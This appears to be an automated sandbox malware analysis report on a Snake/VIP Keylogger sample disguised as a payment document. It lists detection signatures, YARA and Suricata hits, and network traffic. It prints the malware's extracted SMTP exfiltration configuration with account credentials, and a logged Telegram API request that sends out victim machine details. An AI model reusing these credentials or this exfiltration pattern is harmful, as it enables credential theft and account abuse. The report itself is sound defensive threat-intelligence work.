Edit tour

Windows Analysis Report
z30ProofofPaymentAttached.exe

Overview

General Information

Sample name:	z30ProofofPaymentAttached.exe
Analysis ID:	1557792
MD5:	a2c61107b1d0bd03a8133c81b02fe6d8
SHA1:	b27273c26424a5ab644440485196b506ed5e4ee7
SHA256:	f0e637afd17905703f31d1efa7b5c847687560311ecec72b7f84352b4e3c66fc
Tags:	exeSnakeKeyloggeruser-Porcupine
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Yara detected Generic Downloader

Abnormal high CPU Usage

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evaded block containing many API calls

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

OS version to string mapping found (often used in BOTs)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Outbound SMTP Connections

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

z30ProofofPaymentAttached.exe (PID: 7304 cmdline: "C:\Users\user\Desktop\z30ProofofPaymentAttached.exe" MD5: A2C61107B1D0BD03A8133C81B02FE6D8)

RegSvcs.exe (PID: 7712 cmdline: "C:\Users\user\Desktop\z30ProofofPaymentAttached.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "sender24@mzgold.ir", "Password": "^Wg7~Wau!C8H", "Host": "mzgold.ir", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "sender24@mzgold.ir", "Password": "^Wg7~Wau!C8H", "Host": "mzgold.ir", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.3733442866.0000000003019000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e9d4:$a1: get_encryptedPassword 0x2ecf1:$a2: get_encryptedUsername 0x2e7e4:$a3: get_timePasswordChanged 0x2e8ed:$a4: get_passwordField 0x2e9ea:$a5: set_encryptedPassword 0x300e7:$a7: get_logins 0x3004a:$a10: KeyLoggerEventArgs 0x2fcaf:$a11: KeyLoggerEventArgsEventHandler
00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c9a0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3c043:$a3: \Google\Chrome\User Data\Default\Login Data 0x3c2a0:$a4: \Orbitum\User Data\Default\Login Data 0x3cc7f:$a5: \Kometa\User Data\Default\Login Data
00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f611:$s1: UnHook 0x2f618:$s2: SetHook 0x2f620:$s3: CallNextHook 0x2f62d:$s4: _hook
00000007.00000002.3733442866.0000000002E21000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000007.00000002.3731165395.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.3731165395.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000007.00000002.3731165395.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000002.3731165395.0000000000402000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e7d4:$a1: get_encryptedPassword 0x2eaf1:$a2: get_encryptedUsername 0x2e5e4:$a3: get_timePasswordChanged 0x2e6ed:$a4: get_passwordField 0x2e7ea:$a5: set_encryptedPassword 0x2fee7:$a7: get_logins 0x2fe4a:$a10: KeyLoggerEventArgs 0x2faaf:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: z30ProofofPaymentAttached.exe PID: 7304	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: z30ProofofPaymentAttached.exe PID: 7304	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: z30ProofofPaymentAttached.exe PID: 7304	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: z30ProofofPaymentAttached.exe PID: 7304	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x19393c:$a1: get_encryptedPassword 0x193c4f:$a2: get_encryptedUsername 0x193756:$a3: get_timePasswordChanged 0x19385f:$a4: get_passwordField 0x193952:$a5: set_encryptedPassword 0x195e12:$a7: get_logins 0x195d75:$a10: KeyLoggerEventArgs 0x1959de:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: RegSvcs.exe PID: 7712	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 7712	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: RegSvcs.exe PID: 7712	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 7712	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x956ec:$a1: get_encryptedPassword 0x959ff:$a2: get_encryptedUsername 0x95506:$a3: get_timePasswordChanged 0x9560f:$a4: get_passwordField 0x95702:$a5: set_encryptedPassword 0x97bc2:$a7: get_logins 0x97b25:$a10: KeyLoggerEventArgs 0x9778e:$a11: KeyLoggerEventArgsEventHandler
Click to see the 16 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.z30ProofofPaymentAttached.exe.f60000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.z30ProofofPaymentAttached.exe.f60000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.z30ProofofPaymentAttached.exe.f60000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.z30ProofofPaymentAttached.exe.f60000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2cbd4:$a1: get_encryptedPassword 0x2cef1:$a2: get_encryptedUsername 0x2c9e4:$a3: get_timePasswordChanged 0x2caed:$a4: get_passwordField 0x2cbea:$a5: set_encryptedPassword 0x2e2e7:$a7: get_logins 0x2e24a:$a10: KeyLoggerEventArgs 0x2deaf:$a11: KeyLoggerEventArgsEventHandler
1.2.z30ProofofPaymentAttached.exe.f60000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3aba0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a243:$a3: \Google\Chrome\User Data\Default\Login Data 0x3a4a0:$a4: \Orbitum\User Data\Default\Login Data 0x3ae7f:$a5: \Kometa\User Data\Default\Login Data
1.2.z30ProofofPaymentAttached.exe.f60000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d811:$s1: UnHook 0x2d818:$s2: SetHook 0x2d820:$s3: CallNextHook 0x2d82d:$s4: _hook
7.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
1.2.z30ProofofPaymentAttached.exe.f60000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.z30ProofofPaymentAttached.exe.f60000.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
1.2.z30ProofofPaymentAttached.exe.f60000.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.z30ProofofPaymentAttached.exe.f60000.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.z30ProofofPaymentAttached.exe.f60000.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e9d4:$a1: get_encryptedPassword 0x2ecf1:$a2: get_encryptedUsername 0x2e7e4:$a3: get_timePasswordChanged 0x2e8ed:$a4: get_passwordField 0x2e9ea:$a5: set_encryptedPassword 0x300e7:$a7: get_logins 0x3004a:$a10: KeyLoggerEventArgs 0x2fcaf:$a11: KeyLoggerEventArgsEventHandler
7.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.RegSvcs.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e9d4:$a1: get_encryptedPassword 0x2ecf1:$a2: get_encryptedUsername 0x2e7e4:$a3: get_timePasswordChanged 0x2e8ed:$a4: get_passwordField 0x2e9ea:$a5: set_encryptedPassword 0x300e7:$a7: get_logins 0x3004a:$a10: KeyLoggerEventArgs 0x2fcaf:$a11: KeyLoggerEventArgsEventHandler
7.2.RegSvcs.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c9a0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3c043:$a3: \Google\Chrome\User Data\Default\Login Data 0x3c2a0:$a4: \Orbitum\User Data\Default\Login Data 0x3cc7f:$a5: \Kometa\User Data\Default\Login Data
1.2.z30ProofofPaymentAttached.exe.f60000.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c9a0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3c043:$a3: \Google\Chrome\User Data\Default\Login Data 0x3c2a0:$a4: \Orbitum\User Data\Default\Login Data 0x3cc7f:$a5: \Kometa\User Data\Default\Login Data
7.2.RegSvcs.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f611:$s1: UnHook 0x2f618:$s2: SetHook 0x2f620:$s3: CallNextHook 0x2f62d:$s4: _hook
1.2.z30ProofofPaymentAttached.exe.f60000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f611:$s1: UnHook 0x2f618:$s2: SetHook 0x2f620:$s3: CallNextHook 0x2f62d:$s4: _hook
Click to see the 15 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 217.144.107.148, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 7712, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49813

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-18T16:32:33.057056+0100	2803305	3	Unknown Traffic	192.168.2.7	49701	188.114.97.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-18T16:32:31.032775+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49699	193.122.6.168	80	TCP
2024-11-18T16:32:32.235873+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49699	193.122.6.168	80	TCP
2024-11-18T16:32:33.970273+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49702	193.122.6.168	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000007.00000002.3733442866.0000000002E21000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "sender24@mzgold.ir", "Password": "^Wg7~Wau!C8H", "Host": "mzgold.ir", "Port": "587", "Version": "4.4"}
Source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "sender24@mzgold.ir", "Password": "^Wg7~Wau!C8H", "Host": "mzgold.ir", "Port": "587"}

Multi AV Scanner detection for submitted file

Source: z30ProofofPaymentAttached.exe

ReversingLabs: Detection: 31%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Machine Learning detection for sample

Source: z30ProofofPaymentAttached.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: z30ProofofPaymentAttached.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49700 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49780 version: TLS 1.2

Source:	Binary string: wntdll.pdbUGP source: z30ProofofPaymentAttached.exe, 00000001.00000003.1286744686.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, z30ProofofPaymentAttached.exe, 00000001.00000003.1287142771.0000000003410000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: z30ProofofPaymentAttached.exe, 00000001.00000003.1286744686.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, z30ProofofPaymentAttached.exe, 00000001.00000003.1287142771.0000000003410000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00FF6CA9 GetFileAttributesW,FindFirstFileW,FindClose,	1_2_00FF6CA9
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00FF60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	1_2_00FF60DD
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00FF63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	1_2_00FF63F9
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00FFEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	1_2_00FFEB60
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00FFF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	1_2_00FFF5FA
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00FFF56F FindFirstFileW,FindClose,	1_2_00FFF56F
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_01001B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	1_2_01001B2F
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_01001C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	1_2_01001C8A
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_01001F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	1_2_01001F94

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0141F45Dh	7_2_0141F2C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0141F45Dh	7_2_0141F52F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0141F45Dh	7_2_0141F4AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0141FC19h	7_2_0141F961
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 067C0D0Dh	7_2_067C0B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 067C1697h	7_2_067C0B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 067CFAB9h	7_2_067CF810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 067C2C19h	7_2_067C2968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 067C31E0h	7_2_067C2DC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_067C0673
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 067CE501h	7_2_067CE258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 067CE0A9h	7_2_067CDE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 067CE959h	7_2_067CE6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 067CF209h	7_2_067CEF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 067CEDB1h	7_2_067CEB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 067CF661h	7_2_067CF3B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_067C0853
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_067C0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 067CD3A1h	7_2_067CD0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 067CCF49h	7_2_067CCCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 067CD7F9h	7_2_067CD550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 067C31E0h	7_2_067C310E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 067C31E0h	7_2_067C2DC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 067CDC51h	7_2_067CD9A8

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: global traffic

TCP traffic: 192.168.2.7:49813 -> 217.144.107.148:587

Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:648351%0D%0ADate%20and%20Time:%2019/11/2024%20/%2005:20:42%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20648351%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49702 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49699 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49701 -> 188.114.97.3:443

Source: global traffic

TCP traffic: 192.168.2.7:49813 -> 217.144.107.148:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49700 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe

Code function: 1_2_01004EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

1_2_01004EB5

Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
